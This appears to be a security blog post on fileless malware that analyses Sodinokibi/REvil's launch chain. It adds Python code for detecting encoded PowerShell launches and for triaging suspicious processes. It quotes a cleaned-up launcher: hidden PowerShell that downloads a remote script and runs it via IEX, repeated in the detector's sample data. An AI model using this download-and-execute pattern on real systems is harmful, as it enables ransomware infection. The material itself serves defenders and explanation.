I previously wrote about another technique malware and ransomware authors were using to obfuscate their infections. Fileless malware is the natural evolution of this and is far scarier for file-based antivirus solutions. These infections have been making the news with Sodinokibi (or REvil), among others.
These attacks rely on more recent exploits which let the malware run whatever it wants in memory without touching the disk at all (for the infection itself), as long as PowerShell works on the machine. They hit suddenly and efficiently, and most current traditional antivirus solutions miss them. The combination of zero-day exploits and heavily obfuscated launch methods means that preventing them requires vigilance in every aspect of security, from patching to user education.
What Is Fileless Malware?
Fileless malware is malware which does not exist as a file on the disk itself. This is not to say a file cannot be involved (typically a batch file or other script kicks off the process), but the actual payload is not found in a file. These work by having a downloader which looks like nothing more than a simple downloader. This downloader drops a bit of PowerShell which bootstraps the infection from a download somewhere into a collection of exploits, which then loads itself into memory to deliver the final payload.
These types of infections typically lack persistence for the primary infection, but that isn’t to say they couldn’t drop a payload to take over a machine after the primary infection has run its course (some newer versions of Crysis drop a trojan or two from what I’ve seen). These infections avoid most file-based antivirus solutions by skipping file persistence and using novel techniques to kick off the process. They also try to infect or encrypt files using functions which are almost indistinguishable from intentional encryption a user might do.
How Does It Get Through?
Even though it’s a decades-old exploit, things like Heaven’s Gate are still in use today. There are plenty of new exploits, including caches of zero-days, leveraged as well. Heavy obfuscation and nasty exploits allow these types of infections to slip past most antivirus solutions.
Most antivirus solutions work off of either process detection or file detection. File detection is more common, but obviously doesn’t do much when it comes to fileless malware. Process detection on the other hand can be used, but the combination of zero-days and other exploits to slip by detection can leave the antivirus in the dust until the infection is more understood. Even file detection can help with the delivery mechanisms, but the infection has a period where it can hit unobstructed.
Sodinokibi
Sodinokibi, or REvil, is one of the best-known fileless malware variants around today. Sodinokibi works by dropping either a batch file (typically called 1488.bat) or a one-liner, which is a PowerShell command with a base64-encoded string. All this PowerShell piece does is download a file from somewhere like Pastebin or GitHub, load it, and run a function which stages the attack in memory.
The initial pieces look something like (please note: this code has been cleaned up so that it cannot and will not actually execute anything):
1488.bat
cmd.exe /c START %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e [base64 payload]
Base64 decoded
If($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64'){ Start-Process -FilePath "$Env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -argument "IEX ((new-object net.webclient).downloadstring('[link on Pastebin]'));Invoke-[random letters];Start-Sleep -s 1000000;"}else{ IEX ((new-object net.webclient).downloadstring('[link on Pastebin]'));Invoke-[random letters];Start-Sleep -s 1000000; }
The Invoke-[random letters] function lives in the downloaded payload; it stages loading a binary into memory and sets up the jump into that process. This downloaded script is pretty big and came out near 3000 lines in the variant I worked with. It is obviously quite nasty even though it doesn’t really have any telltale signs in the payload that it’s about to do something so sinister. This pipeline lets it cut through many antivirus solutions if the initial piece is able to run.
The infection then goes through and encrypts files. It targets basically every common file format which can hold data, from pictures to zipped files. Unlike some other infections, it very rarely leaves the machine in a non-functioning state.
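The launch chain above (cmd.exe starting a hidden, profile-less powershell.exe with an encoded command that downloads and IEXes a remote script) is what process-creation logging sees, and it can be flagged without ever fetching the second stage. The following is an added example, not the author's code or anything from the malware: it decodes the -EncodedCommand argument (base64 of the UTF-16LE script) from constructed 4688-style records and matches the decoded text against the indicators the page describes. The STAGE2 stand-in mirrors the page's cleaned-up one-liner with placeholders for the link and the function name.

```python
import base64
import re
# Constructed stand-in for the decoded stage above (placeholders for the link and function name).
STAGE2 = ("If($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64'){ Start-Process -FilePath "
          "\"$Env:WINDIR\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" -argument "
          "\"IEX ((new-object net.webclient).downloadstring('[link]'));Invoke-XXXX;Start-Sleep -s 1000000;\"}"
          "else{ IEX ((new-object net.webclient).downloadstring('[link]'));Invoke-XXXX;Start-Sleep -s 1000000; }")
# Constructed 4688-style records; powershell -e takes base64 of the UTF-16LE script (what 1488.bat carries).
SAMPLE_EVENTS = [
    {"parent": "C:\\Windows\\System32\\cmd.exe", "cmdline":
     "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -e "
     + base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")},
    {"parent": "C:\\Windows\\explorer.exe", "cmdline":  # benign admin script, for contrast
     "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -File C:\\inv.ps1"},
]
# Downloader-stage indicators, matched case-insensitively in the decoded script.
STAGE2_INDICATORS = [(r"new-object\s+net\.webclient", "WebClient download"),
                     (r"\biex\b|invoke-expression", "Invoke-Expression"),
                     (r"syswow64\\windowspowershell", "32-bit PowerShell relaunch")]

def _is_switch(tok, name, min_len=2):
    # PowerShell accepts any unambiguous prefix of a switch (-e, -enc, -EncodedCommand).
    return tok.startswith("-") and len(tok) >= min_len and name.startswith(tok[1:].lower())

def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    toks = re.findall(r'"[^"]*"|\S+', cmdline)
    for i, tok in enumerate(toks[:-1]):
        if _is_switch(tok, "encodedcommand"):
            try:
                return base64.b64decode(toks[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def assess(event):
    """Flag the page's launch pattern: hidden, profile-less, encoded PowerShell from cmd.exe."""
    toks = re.findall(r'"[^"]*"|\S+', event["cmdline"])
    if not toks or not toks[0].lower().strip('"').endswith("powershell.exe"):
        return []
    findings = []
    if any(_is_switch(t, "noprofile", 4) for t in toks):
        findings.append("NoProfile")
    if any(_is_switch(t, "windowstyle") and n.lower() == "hidden" for t, n in zip(toks, toks[1:])):
        findings.append("hidden window")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        findings.append("encoded command")
        findings += [label for pat, label in STAGE2_INDICATORS if re.search(pat, decoded, re.I)]
    if event["parent"].lower().endswith("\\cmd.exe"):
        findings.append("spawned by cmd.exe")
    return findings
```

Run over real 4688 or Sysmon event 1 data, the benign record scores only "NoProfile" while the 1488.bat chain lights up every check; the decoded script is also what you would hand to an analyst instead of the opaque base64 blob.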
What Led to Fileless Malware?
Fileless malware is the natural evolution of what I previously termed object-oriented malware. Object-oriented malware gets past antivirus solutions in a similar fashion, but still uses intermediate files which can be detected or blocked. There are multiple weaknesses in that process which can cause an infection to be wiped out or at least detected. The persistence can be annoying, but once an antivirus solution picks up on it, it can break enough of the process to leave the infection as nothing more than a nuisance.
Fileless malware is simple and efficient. It takes many of the techniques object-oriented malware uses and pushes them to the next level for obfuscating its operation and hiding itself on the system. The philosophy behind object-oriented malware is complexity leading to resilience and obfuscation, while fileless malware is designed with simplicity in mind. Fileless malware typically has a singular goal, and the persistence it has is in the damage it does rather than in trying to keep the machine infected.
What Can Be Done to Stop Fileless Malware?
Virtually all fileless malware variants rely on PowerShell to run. Disabling PowerShell is a quick way to prevent this, but isn’t typically the best solution for most production environments without heavy tweaking and consideration of site management and site requirements. Some antivirus solutions provide a saner way to restrict PowerShell without completely crippling the machine, but it ultimately depends on what solution is employed or can be employed.
A lot of these infections are packed in with phishing emails or deployed via RMM exploits. Locking down spam combined with user education can help prevent many of these issues (and more). RMM exploits are a bit harder to nail down, but 2FA and locking down accounts give the most bang for the buck. Keeping on top of zero-day exploits by patching machines and keeping up with CVEs is essential as well.
A combination of antivirus solutions which mix the philosophies of process and file scanning can be used to try to prevent these types of attacks from getting through. Process scanning can affect performance in some cases, and depending on the solution may or may not catch these attacks if the attack vector is too new. File scanning won’t really do much for these unless there’s a dropper, but it is very useful for other classes of infections and can prevent them from getting a chance to even run.
Rolling Back the Clock
No solution is going to fully prevent any and every infection, but the goal is to reduce the attack surface to the point a successful exploit is the exception rather than the rule. Should you get hit by this type of infection, there really isn’t much which can be done aside from clearing out the infection and restoring from backup. The infection can usually be tracked down by watching for weird processes (processes masquerading as svchost.exe, fake Windows processes, names which are just a combination of characters which don’t look human readable, etc.) and killing them (though you shouldn’t just kill processes at random if you don’t know what you’re doing with this). If there is a ransom note or some other sign of a specific infection, one can use it to track down more specific remediation steps for the infection.
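The process-hunting signs listed above (a system process name running from the wrong place or with the wrong parent, lookalike names, names that are just a jumble of characters) can be turned into a triage pass over a process listing. This is an added example, not the author's code: the EXPECTED table, the Proc records and the "random name" thresholds are constructed for illustration, and the output is a list of reasons to look closer, not a verdict to kill on.

```python
import ntpath
import re
from collections import namedtuple
Proc = namedtuple("Proc", "name path parent")  # one row of a process listing
# Where a few core Windows processes always live and what normally spawns them (constructed,
# deliberately short; a production table is longer and varies by OS version).
EXPECTED = {
    "svchost.exe": ("c:\\windows\\system32", "services.exe"),
    "csrss.exe": ("c:\\windows\\system32", "smss.exe"),
}
def edit_distance(a, b):
    """Plain Levenshtein distance, used to spot lookalike names (svch0st.exe, scvhost.exe)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]
def looks_random(stem):
    """Not human readable: 8+ consonants (xkqzvtrp) or an alphanumeric blob with several digits."""
    letters = re.sub(r"[^a-z]", "", stem)
    no_vowels = len(letters) >= 8 and not re.search(r"[aeiouy]", letters)
    digit_blob = len(stem) >= 8 and stem.isalnum() and sum(c.isdigit() for c in stem) >= 3
    return no_vowels or digit_blob
def triage(proc):
    """Return the reasons a process deserves a closer look (empty list = nothing odd)."""
    name = proc.name.lower()
    stem = name[:-4] if name.endswith(".exe") else name
    reasons = []
    if name in EXPECTED:  # a real system process name: check where and by whom it runs
        exp_dir, exp_parent = EXPECTED[name]
        if ntpath.dirname(proc.path.lower()) != exp_dir:
            reasons.append("runs from %s, expected %s" % (ntpath.dirname(proc.path), exp_dir))
        if proc.parent.lower() != exp_parent:
            reasons.append("parent %s, expected %s" % (proc.parent, exp_parent))
    else:  # unknown name: is it imitating a system process, or just noise?
        for known in EXPECTED:
            if len(stem) >= 5 and edit_distance(stem, known[:-4]) <= 2:
                reasons.append("lookalike of " + known)
        if looks_random(stem):
            reasons.append("name does not look human readable")
    return reasons
# Constructed process listing mirroring the signs the text lists.
SAMPLE_PROCS = [
    Proc("svchost.exe", "C:\\Windows\\System32\\svchost.exe", "services.exe"),
    Proc("svchost.exe", "C:\\Users\\bob\\AppData\\Local\\Temp\\svchost.exe", "cmd.exe"),
    Proc("svch0st.exe", "C:\\ProgramData\\svch0st.exe", "powershell.exe"),
    Proc("xkqzvtrp.exe", "C:\\Users\\bob\\AppData\\Roaming\\xkqzvtrp.exe", "powershell.exe"),
]
```

Feed it the output of a process snapshot (name, full path, parent name) and review the flagged rows by hand; the thresholds are tuned so short legitimate names such as sppsvc or svchost itself are not flagged as random.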
Most of these types of infections will be ransomware since they are not made to be persistent (aside from the damage). Having good backups and being prepared to restore from them at any time is essential. If prevention doesn’t work, restoration is the only choice. To roll back the clock, you have to have a solid plan and a way to implement it as well.
Conclusion
Fileless malware is the next generation of malware and is something to be aware of. Traditional antivirus software tends to miss these types of attacks when they first launch. Preventing scripting and locking down zero-day exploits where possible is the best way to deal with and prevent these, but isn’t always an option in every scenario. Minimize the attack surface as much as possible and make sure to have good backups wherever possible.
Image by Elchinator from Pixabay